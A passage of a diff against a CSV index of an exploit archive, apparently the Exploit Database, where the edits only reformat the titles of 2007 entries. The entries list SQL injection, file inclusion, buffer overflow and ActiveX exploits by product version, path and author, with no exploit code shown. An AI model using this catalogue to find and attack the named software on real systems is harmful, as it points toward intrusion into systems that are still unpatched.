Remote File Inclusion Vulnerabilities",2007-05-23,"Mehmet Ince",php,webapps,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit",2007-05-23,shinnai,windows,dos,0 -3974,platforms/php/webapps/3974.pl,"Dokeos <= 1.8.0 (my_progress.php course) Remote SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 +3974,platforms/php/webapps/3974.pl,"Dokeos <= 1.8.0 - (my_progress.php course) Remote SQL Injection Exploit",2007-05-23,Silentz,php,webapps,0 3975,platforms/windows/local/3975.c,"MagicISO <= 5.4 (build239) - .cue File Local Buffer Overflow Exploit",2007-05-23,vade79,windows,local,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project (Company Name) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project (Description) Stack Overflow PoC",2007-05-23,UmZ,windows,dos,0 -3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 +3978,platforms/windows/dos/3978.pl,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow PoC",2007-05-24,n00b,windows,dos,0 3979,platforms/windows/dos/3979.html,"LeadTools Raster Dialog File Object ActiveX Remote Buffer Overflow PoC",2007-05-24,shinnai,windows,dos,0 -3980,platforms/php/webapps/3980.pl,"Dokeos <= 1.6.5 (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 -3981,platforms/php/webapps/3981.php,"cpCommerce <= 1.1.0 (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 +3980,platforms/php/webapps/3980.pl,"Dokeos <= 1.6.5 - (courseLog.php scormcontopen) SQL Injection Exploit",2007-05-24,Silentz,php,webapps,0 +3981,platforms/php/webapps/3981.php,"cpCommerce <= 1.1.0 - (category.php id_category) SQL Injection Exploit",2007-05-24,Kacper,php,webapps,0 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP Service Control Remote BoF Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion Vulnerabilities",2007-05-24,DeltahackingTEAM,php,webapps,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP ZIP Compression Remote BoF Exploit",2007-05-25,rgod,windows,remote,0 3985,platforms/osx/local/3985.txt,"Mac OS X <= 10.4.8 - pppd Plugin Loading Privilege Escalation Exploit",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster Dialog File_D Object Remote Buffer Overflow Exploit",2007-05-25,shinnai,windows,dos,0 -3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 +3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 3988,platforms/php/webapps/3988.php,"gCards <= 1.46 SQL Injection/Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 -3989,platforms/php/webapps/3989.pl,"My Little Forum <= 1.7 (user.php id) Remote SQL Injection Exploit",2007-05-25,Silentz,php,webapps,0 -3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0 +3989,platforms/php/webapps/3989.pl,"My Little Forum <= 1.7 - (user.php id) Remote SQL Injection Exploit",2007-05-25,Silentz,php,webapps,0 +3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0 3992,platforms/php/webapps/3992.txt,"FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities",2007-05-25,"Mehmet Ince",php,webapps,0 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote BoF Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion Vulnerabilities",2007-05-26,"ThE TiGeR",php,webapps,0 -3995,platforms/php/webapps/3995.txt,"TROforum 0.1 (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 +3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow Exploit (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities",2007-05-27,"ThE TiGeR",php,webapps,0 -3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 +3998,platforms/php/webapps/3998.php,"Fundanemt <= 2.2.0 - (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter <= 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 -4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 +4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0 4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0 4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) RFI",2007-05-29,"ThE TiGeR",php,webapps,0 4006,platforms/php/webapps/4006.php,"Pheap 2.0 Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 -4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 +4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) Remote SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component Denial of Service Exploit",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 @@ -3681,15 +3681,15 @@ id,file,description,date,author,platform,type,port 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0 4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 -4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 -4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 +4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 - (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 +4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 - (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 4033,platforms/windows/dos/4033.rb,"SNMPc <= 7.0.18 - Remote Denial of Service Exploit (Metasploit)",2007-06-04,"En Douli",windows,dos,0 -4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 (scdir) Remote File Inclusion Vulnerabilities",2007-06-05,"Mehmet Ince",php,webapps,0 -4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 (index.php epi) Remote SQL Injection",2007-06-05,s0cratex,php,webapps,0 +4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion Vulnerabilities",2007-06-05,"Mehmet Ince",php,webapps,0 +4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) Remote SQL Injection",2007-06-05,s0cratex,php,webapps,0 4036,platforms/php/webapps/4036.php,"PBLang <= 4.67.16.a Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 -4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 (index.php epi) Remote SQL Injection Exploit",2007-06-06,Silentz,php,webapps,0 +4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) Remote SQL Injection Exploit",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) Remote SQL Injection Exploit",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - Remote SQL Injection",2007-06-06,kerem125,asp,webapps,0 @@ -3699,12 +3699,12 @@ id,file,description,date,author,platform,type,port 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service Exploit",2007-06-07,Kad,windows,dos,0 4045,platforms/windows/remote/4045.py,"Microsoft Windows Animated Cursor Stack Overflow Exploit",2007-06-07,"RISE Security",windows,remote,0 4046,platforms/windows/dos/4046.pl,"MiniWeb Http Server 0.8.x - Remote Denial of Service Exploit",2007-06-07,gbr,windows,dos,0 -4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 +4047,platforms/windows/dos/4047.c,"SafeNET High Assurance Remote 1.4.0 - (IPSecDrv.sys) Remote DoS",2007-06-08,mu-b,windows,dos,0 4049,platforms/windows/remote/4049.html,"Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit",2007-06-08,shinnai,windows,remote,0 4050,platforms/windows/remote/4050.html,"Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit",2007-06-08,shinnai,windows,remote,0 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - (.lst) Local Buffer Overflow Exploit",2007-06-08,n00b,windows,local,0 -4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 -4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 +4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 +4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4054,platforms/php/webapps/4054.php,"e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit",2007-06-08,Silentz,php,webapps,0 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds Remote File Inclusion Exploit",2007-06-09,"not sec group",php,webapps,0 4056,platforms/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow PoC",2007-06-09,DeltahackingTEAM,windows,dos,0 @@ -3713,7 +3713,7 @@ id,file,description,date,author,platform,type,port 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta Remote Command Execution PoC",2007-06-12,"Thor Larholm",windows,remote,0 -4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 +4062,platforms/php/webapps/4062.pl,"Fuzzylime Forum 1.0 - (low.php topic) Remote SQL Injection Exploit",2007-06-12,Silentz,php,webapps,0 4063,platforms/php/webapps/4063.txt,"xoops module tinycontent 1.5 - Remote File Inclusion",2007-06-12,Sp[L]o1T,php,webapps,0 4064,platforms/php/webapps/4064.txt,"xoops module horoscope <= 2.0 - Remote File Inclusion",2007-06-12,BeyazKurt,php,webapps,0 4065,platforms/windows/remote/4065.html,"Microsoft Speech API ActiveX Control - Remote BoF Exploit (Windows 2000 SP4)",2007-06-13,rgod,windows,remote,0 @@ -3722,74 +3722,74 @@ id,file,description,date,author,platform,type,port 4068,platforms/php/webapps/4068.txt,"XOOPS Module XFsection (modify.php) Remote File Inclusion",2007-06-13,Sp[L]o1T,php,webapps,0 4069,platforms/php/webapps/4069.txt,"XOOPS Module XT-Conteudo - (spaw_root) RFI",2007-06-13,g00ns,php,webapps,0 4070,platforms/php/webapps/4070.txt,"xoops module cjay content 3 - Remote File Inclusion",2007-06-13,g00ns,php,webapps,0 -4071,platforms/php/webapps/4071.txt,"Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 -4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 -4074,platforms/php/webapps/4074.txt,"phpMyInventory 2.8 (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 -4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 (serverPath) Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 -4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 (language) Local File Inclusion Exploit",2007-06-17,Dj7xpl,php,webapps,0 +4071,platforms/php/webapps/4071.txt,"Sitellite CMS <= 4.2.12 - (559668.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 +4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - (phphtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 +4074,platforms/php/webapps/4074.txt,"phpMyInventory 2.8 - (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 +4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 +4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - (language) Local File Inclusion Exploit",2007-06-17,Dj7xpl,php,webapps,0 4078,platforms/php/webapps/4078.php,"Solar Empire <= 2.9.1.1 - BlindSQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 -4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 +4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow Exploit",2007-06-19,rgod,windows,local,0 4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection/Remote Code Execution Exploit",2007-06-19,Silentz,php,webapps,0 -4082,platforms/php/webapps/4082.pl,"LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 +4082,platforms/php/webapps/4082.pl,"LiveCMS <= 3.4 - (categoria.php cid) Remote SQL Injection Exploit",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - Remote SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"xoops module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion Vulnerabilities",2007-06-20,GoLd_M,php,webapps,0 4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) <= 1.9.6 - Remote File Inclusion Exploit",2007-06-20,Kw3[R]Ln,php,webapps,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 -4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 -4090,platforms/php/webapps/4090.pl,"Powl 0.94 (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 +4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 +4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion Vulnerabilities",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 -4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 (index.php ID) Remote SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 +4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) Remote SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine <= 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 -4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 +4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - (index.php submit) SQL Injection Exploit",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 -4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 (pageid) Remote SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 +4100,platforms/php/webapps/4100.txt,"phpTrafficA <= 1.4.2 - (pageid) Remote SQL Injection",2007-06-24,"laurent gaffié ",php,webapps,0 4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL (NCTWMAFile2.dll 2.6.2.157) - Exploit",2007-06-25,shinnai,windows,remote,0 -4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 +4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL/XSS) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog (newsid) Remote SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 -4106,platforms/php/webapps/4106.php,"DreamLog 0.5 (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 -4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 (news_id) Remote SQL Injection",2007-06-25,Katatafish,php,webapps,0 +4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload Exploit",2007-06-25,Dj7xpl,php,webapps,0 +4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) Remote SQL Injection",2007-06-25,Katatafish,php,webapps,0 4108,platforms/php/webapps/4108.txt,"eDocStore (doc.php doc_id) Remote SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0 4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 -4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 -4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 (index.php3) Remote File Inclusion Vulnerabilities",2007-06-26,g00ns,php,webapps,0 +4111,platforms/php/webapps/4111.txt,"phpSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 +4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion Vulnerabilities",2007-06-26,g00ns,php,webapps,0 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - Remote SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 -4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities",2007-06-27,Katatafish,php,webapps,0 -4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 +4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - (lang) Local File Inclusion Vulnerabilities",2007-06-27,Katatafish,php,webapps,0 +4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer SMIL wallclock Stack Overflow PoC",2007-06-27,axis,windows,dos,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 4120,platforms/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow PoC",2007-06-27,str0ke,windows,dos,0 4121,platforms/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name PoC",2007-06-27,ZhenHan.Liu,windows,dos,0 -4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 +4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 - (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit",2007-06-28,rgod,windows,remote,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum <= 6.4.4 - Local File Inclusion Vulnerabilities",2007-06-28,Katatafish,php,webapps,0 -4125,platforms/php/webapps/4125.txt,"WebChat 0.78 (login.php rid) Remote SQL Injection",2007-06-28,r00t,php,webapps,0 +4125,platforms/php/webapps/4125.txt,"WebChat 0.78 - (login.php rid) Remote SQL Injection",2007-06-28,r00t,php,webapps,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow PoC",2007-06-29,r0ut3r,windows,dos,0 -4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 +4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 - (view_sub_cat.php cat_id) SQL Injection",2007-06-29,t0pP8uZz,php,webapps,0 4128,platforms/php/webapps/4128.txt,"Buddy Zone <= 1.5 - Multiple SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 4129,platforms/php/webapps/4129.txt,"Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 -4130,platforms/php/webapps/4130.txt,"TotalCalendar <= 2.402 (view_event.php) Remote SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 -4131,platforms/php/webapps/4131.txt,"XCMS 1.1 (Galerie.php) Local File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 +4130,platforms/php/webapps/4130.txt,"TotalCalendar <= 2.402 - (view_event.php) Remote SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 +4131,platforms/php/webapps/4131.txt,"XCMS 1.1 - (Galerie.php) Local File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion Vulnerabilities",2007-06-30,"Mehmet Ince",php,webapps,0 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - Remote SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store - (process.php) Remote SQL Injection",2007-07-01,t0pP8uZz,php,webapps,0 -4135,platforms/php/webapps/4135.pl,"phpEventCalendar <= 0.2.3 (eventdisplay.php) SQL Injection Exploit",2007-07-01,Iron,php,webapps,0 +4135,platforms/php/webapps/4135.pl,"phpEventCalendar <= 0.2.3 - (eventdisplay.php) SQL Injection Exploit",2007-07-01,Iron,php,webapps,0 4136,platforms/php/webapps/4136.txt,"YouTube Clone Script (msg.php id) Remote SQL Injection",2007-07-02,t0pP8uZz,php,webapps,0 4137,platforms/windows/dos/4137.html,"HP Instant Support (Driver Check) Remote Buffer Overflow Exploit PoC",2007-07-02,shinnai,windows,dos,0 4138,platforms/php/webapps/4138.txt,"AV Arcade 2.1b (index.php id) Remote SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4139,platforms/php/webapps/4139.txt,"PHPDirector <= 0.21 (videos.php id) Remote SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 -4140,platforms/php/webapps/4140.txt,"vbzoom 1.x (forum.php MainID) Remote SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 +4139,platforms/php/webapps/4139.txt,"PHPDirector <= 0.21 - (videos.php id) Remote SQL Injection",2007-07-02,Kw3[R]Ln,php,webapps,0 +4140,platforms/php/webapps/4140.txt,"vbzoom 1.x - (forum.php MainID) Remote SQL Injection",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection",2007-07-03,t0pP8uZz,php,webapps,0 -4142,platforms/php/webapps/4142.txt,"Girlserv ads <= 1.5 (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 +4142,platforms/php/webapps/4142.txt,"Girlserv ads <= 1.5 - (details_news.php) SQL Injection",2007-07-03,"Cold Zero",php,webapps,0 4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - BoF Exploit",2007-07-03,shinnai,windows,remote,0 4144,platforms/php/webapps/4144.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit (2 method)",2007-07-03,BlackHawk,php,webapps,0 4145,platforms/php/webapps/4145.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit",2007-07-03,BlackHawk,php,webapps,0 @@ -3797,31 +3797,31 @@ id,file,description,date,author,platform,type,port 4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i - viewforum.php Remote SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 